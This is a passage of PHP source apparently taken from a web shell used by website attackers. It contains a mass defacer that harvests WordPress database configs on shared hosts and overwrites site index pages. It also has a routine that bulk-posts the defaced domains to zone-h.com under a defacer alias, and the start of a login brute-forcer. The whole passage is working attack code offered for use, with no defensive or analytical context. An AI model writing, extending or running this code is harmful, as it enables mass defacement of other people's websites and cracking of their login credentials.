}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $def);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count2++;
} else {echo 'FAILED | ';
}echo '
';
}}echo '
';
echo '
';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';
echo 'View Total Defaced urls
';
if($count1+$count2 > 0){echo 'Send to Zone-H';
}}echo 'Wordpress and Joomla Mass Defacer
';
if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '';
}$milaf_el_index = $_POST['defpage'];
if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index);
}if($_POST['mode']==2) { exec_mode_2($milaf_el_index);
}if($_POST['mode']==3) { exec_mode_3($milaf_el_index);
}}if($_GET['mode']==1) { exec_mode_1($milaf_el_index);
}echo '';
} elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';
$display_details=0;
$method=14;
$reason=5;
error_reporting(0);
set_time_limit(0);
if(!function_exists('curl_init')){echo "CURL ERROR\n";
exit;
}$cli=(isset($argv[0]))?1:0;
if($cli==1){$file=$argv[1];
$sites=file($file);
}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);
}@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
@ob_implicit_flush(true);
@ob_end_flush();
if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);
}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];
$sites=file($file);
} echo <<
EOF;
if(!isset($_POST['defacer'])){ echo <<Zone-H Poster
';
exit;
}$sites=array_unique(str_replace('http://','',$sites));
$total=count($sites);
echo "[+] Total unique domain: $total\n\n";
$pause=10;
$start=time();
$main=curl_multi_init();
for($m=0;
$m<3;
$m++){$http[] = curl_init();
}for($n=0;
$n<$total;
$n +=30){if($display_details==1){for($x=0;
$x<30;
$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';
echo "\n";
}}$d=$n+30;
if($d>$total){$d=$total;
}echo "=====================>[$d/$total]\n";
for($w=0;
$w<3;
$w++){$p=$w * 10;
if(!(isset($sites[$n+$p]))){$pause=$w;
break;
}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";
$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;
WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
curl_setopt_array($http[$w],$curlopt);
curl_multi_add_handle($main,$http[$w]);
}$running = null;
do{curl_multi_exec($main,$running);
}while($running > 0);
for($m=0;
$m<3;
$m++){if($pause==$m){break;
}curl_multi_remove_handle($main, $http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if ($code != 200) {while(true){echo' [-]Error!....Retrying';
echo "\n";
sleep(5);
curl_exec($http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if( $code== 200){break 1;
}}}}}$end= time() - $start;
echo 'Done';
echo "\n\n[*]Time: $end seconds\n";
curl_multi_close($main);
if($cli==0){echo '';
}exit;
} elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){$target = "localhost";
}
?>